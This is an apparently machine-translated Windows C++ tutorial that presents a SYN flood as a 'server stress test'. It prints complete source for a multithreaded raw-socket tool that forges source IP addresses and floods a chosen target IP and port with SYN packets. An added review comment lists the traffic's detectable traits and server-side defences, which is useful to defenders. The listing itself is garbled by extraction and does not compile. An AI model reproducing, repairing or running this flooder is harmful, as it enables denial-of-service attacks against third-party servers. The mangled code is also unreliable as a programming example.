Analysis of Windows core programming code based on Visual C++ (38): server stress test with SYN requests


A SYN flood, presented here as a server stress test, exploits a weakness in the TCP handshake: it sends a large number of forged TCP connection requests so that the target's resources are exhausted and it cannot respond to or process normal service requests in time. A normal TCP connection requires a three-way handshake. First, the client sends a packet with the SYN flag set; the server replies with a SYN/ACK packet, indicating that the request has been accepted; finally, the client returns an ACK packet, which completes the TCP connection. If the client never sends that final acknowledgement after the server's reply, the server keeps waiting until a timeout expires, and for that whole period the half-open connection is held in a queue of limited size. If a large number of SYN packets are sent to the server and never acknowledged, the server's TCP resources are quickly exhausted, so legitimate connections fail and the server may even crash. This half-open backlog exhaustion is the condition that SYN cookies and backlog or timeout tuning on the server are meant to absorb.

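When developing website projects, we often need to test how a server behaves under load so that the network can be tuned. SYN requests are often used for this kind of stress test. The code below is analyzed as an example of such a test. Note that the listing was collapsed onto a few lines and altered by extraction and machine translation, so it does not compile as shown.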

 

/*
 * NOTE(review): this listing was damaged by web extraction and machine
 * translation. Identifiers and keywords have been case-folded or
 * capitalised, operators and spacing have been altered, and the whole
 * program was collapsed onto a few lines. It is not compilable as shown and
 * is kept below unmodified.
 *
 * What the listing describes, for anyone writing detections or tuning a
 * server against this kind of traffic: a raw socket with IP_HDRINCL set,
 * hand-built IP and TCP headers, and a send loop with no receive path, so no
 * handshake is ever completed by the sender. As written, each packet carries
 * only the SYN flag (th_flag = 2), a window of 16384, TTL 128 and IP ident 1.
 * The source address is the destination address plus a counter, and the
 * source port and the sequence number (0x28376839 + counter) step with that
 * same counter, which appears to wrap at 65536. Those fixed and linearly
 * stepping header fields distinguish this traffic from real clients.
 *
 * On the receiving side, the effect the article describes (half-open entries
 * filling a limited queue) is what SYN cookies, a larger backlog with shorter
 * SYN/ACK retry timers, and upstream rate limiting of SYN-only packets are
 * designed to absorb. Ingress filtering of spoofed source addresses (BCP 38)
 * removes the forged-source component.
 */
# Include <winsock2.h> # include <ws2tcpip. h> # include <stdio. h> # pragma comment (Lib, "ws2_32.lib") # define seq 0x28376839int threadnum, maxthread, port; char * destip; // target ipvoid display (void) // define the status prompt function {static int play = 0; // progress bar char * plays [12] = {"| ","/","-", "\", "|", "/", "-", "\", "| ","/","-", "\" ,}; printf ("= % s = % d threads \ r", plays [play], threadnum); play = (play = 11 )? 0: Play + 1;} // define a tcphdr structure to store the TCP Header typedef struct tcphdr {ushort th_sport; // 16-bit source port number ushort th_dport; // 16-bit destination port number unsigned int th_seq; // 32-bit serial number unsigned int th_ack; // 32-bit confirmation number unsigned char th_lenres; // four unsigned char th_flag in the four-digit Header Length + six-digit reserved characters; // the six-digit flag ushort th_win; // The 16-digit window size ushort th_sum; // 16-bit verification and ushort th_urp; // 16-bit emergency data offset} tcp_header; // define an iphdr to store the IP header typedef struct iphdr // IP header {unsigned char h_verlen; // four-digit hand length and four-digit I P version unsigned char TOS; // The 8-bit type service unsigned short total_len; // The 16-bit total length unsigned short ident; // The 16-Bit Flag unsigned short frag_and_flags; // 3-bit flag (such as SYN, ack, etc.) 
unsigned char TTL; // 8-bit survival time unsigned char proto; // 8-bit protocol unsigned short checksum; // ip hand verification and unsigned int sourceip; // forged IP address unsigned int destip; // attacked IP address} ip_header; // pseudo TCP Header for TCP verification and calculation, ensure the validity of TCP verification struct {unsigned long saddr; // source address unsigned long daddr; // target address Cha R mbz; // empty char ptcl; // protocol type unsigned short tcpl; // TCP length} psd_header; // calculate the verification and function, set the validation and field of the IP header to 0 (ip_header.checksum = 0) // then calculate the sum of the binary anticode of the entire IP header. Ushort checksum (ushort * buffer, int size) {unsigned long cksum = 0; while (size> 1) {cksum + = * buffer ++; size-= sizeof (ushort);} If (size) cksum + = * (uchar *) buffer; cksum = (cksum> 16) + (cksum & 0 xFFFF ); cksum + = (cksum> 16); Return (ushort )(~ Cksum);} DWORD winapi synfloodthread (lpvoid LP) // synflood thread function {socket sock = NULL; int errorcode = 0, flag = true, timeout = 2000, fakeipnet, fakeiphost, datasize = 0, sendseq = 0; struct sockaddr_in sockaddr; tcp_header tcpheader; ip_header ipheader; char sendbuf [128]; sock = wsasocket (af_inet, sock_raw, ipproto_raw, null, 0, wsa_flag_overlapped); If (sock = invalid_socket) {printf ("socket failed: % d \ n", wsagetlasterror (); Return 0;} // Set ip_hdrincl so that you can fill in the IP header errorcode = setsockopt (sock, ipproto_ip, ip_hdrincl, (char *) & flag, sizeof (INT); If (errorcode = socket_error) {printf ("set sockopt failed: % d \ n", wsagetlasterror (); Return 0 ;}// set the sending timeout errorcode = setsockopt (sock, sol_socket, so_sndtimeo, (char *) & timeout, sizeof (timeout); If (errorcode = socket_error) {printf ("set sockopt time out failed: % d \ n ", wsagetlasterror (); Return 0 ;}// set the target address memset (& Sockaddr, 0, sizeof (sockaddr); sockaddr. 
sin_family = af_inet; sockaddr. sin_addr.s_addr = inet_addr (destip); fakeipnet = inet_addr (destip); fakeiphost = ntohl (fakeipnet); // fill in the IP header ipheader. h_verlen = (4 <4 | sizeof (ip_header)/sizeof (unsigned long); ipheader. total_len = htons (sizeof (ip_header) + sizeof (tcp_header); ipheader. ident = 1; ipheader. frag_and_flags = 0; ipheader. TTL = 128; ipheader. PROTO = ipproto_tcp; ipheade R. checksum = 0; ipheader. sourceip = htonl (fakeiphost + sendseq); ipheader. destip = inet_addr (destip); // fill in the TCP Header tcpheader. th_dport = htons (port); tcpheader. th_sport = htons (8080); tcpheader. th_seq = htonl (SEQ + sendseq); tcpheader. th_ack = 0; tcpheader. th_lenres = (sizeof (tcp_header)/4 <4 | 0); tcpheader. th_flag = 2; tcpheader. th_win= htons (16384); tcpheader. th_urp = 0; tcpheader. th_sum = 0; psd_header.saddr = ipheader. Sourceip; psd_header.daddr = ipheader. destip; psd_header.mbz = 0; psd_header.ptcl = ipproto_tcp; psd_header.tcpl = htons (sizeof (tcpheader); For (;) {sendseq = (sendseq = 65536 )? 1: sendseq + 1; ipheader. checksum = 0; ipheader. sourceip = htonl (fakeiphost + sendseq); tcpheader. th_seq = htonl (SEQ + sendseq); tcpheader. th_sport = htons (sendseq); tcpheader. th_sum = 0; psd_header.saddr = ipheader. sourceip; // copy the TCP pseudo header and TCP header to the same buffer and calculate TCP verification and memcpy (sendbuf, & psd_header, sizeof (psd_header )); memcpy (sendbuf + sizeof (psd_header), & tcpheader, sizeof (tcpheader); tcpheader. th_sum = checksum (ushort *) sendbuf, sizeo F (psd_header) + sizeof (tcpheader); memcpy (sendbuf, & ipheader, sizeof (ipheader); memcpy (sendbuf + sizeof (ipheader), & tcpheader, sizeof (tcpheader); memset (sendbuf + sizeof (ipheader) + sizeof (tcpheader), 0, 4); datasize = sizeof (ipheader) + sizeof (tcpheader); ipheader. 
checksum = checksum (ushort *) sendbuf, datasize); memcpy (sendbuf, & ipheader, sizeof (ipheader); sendto (sock, sendbuf, datasize, 0, (struct sockaddr *) & sockaddr, sizeo F (sockaddr); display ();} // end for sleep (20); interlockedexchangeadd (long *) & threadnum,-1); Return 0 ;} void usage (char * name) {printf ("\ t ============================ SYN flood ================ ===========\ N "); printf ("\ t =========== gxisone@hotmail.com 2004/7/6 =========\ N"); printf ("\ tusage: % s [dest_ip] [port] [thread] \ n ", name); printf (" \ texample: % s 192.168.1.1 80 100 \ n ", name );} int main (INT argc, char * argv []) {If (argc! = 4) {usage (argv [0]); Return 0;} usage (argv [1]); int errorcode = 0; destip = argv [1]; // obtain the target host ipport = atoi (argv [2]); // obtain the target port number maxthread = (maxthread> 100 )? 100: atoi (argv [3]); // if the number of threads is greater than 100, set the number of threads to 100 wsadata; If (errorcode = wsastartup (makeword ), & wsadata ))! = 0) {printf ("wsastartup failed: % d \ n", errorcode); Return 0;} printf ("[start] ...... \ npress any key to stop! \ N "); While (threadnum <maxthread) // loop creation thread {If (createthread (null, 0, synfloodthread, 0) {sleep (10 ); threadnum ++ ;}} wsacleanup (); printf ("\ n [stopd] ...... \ n "); Return 0 ;}

 
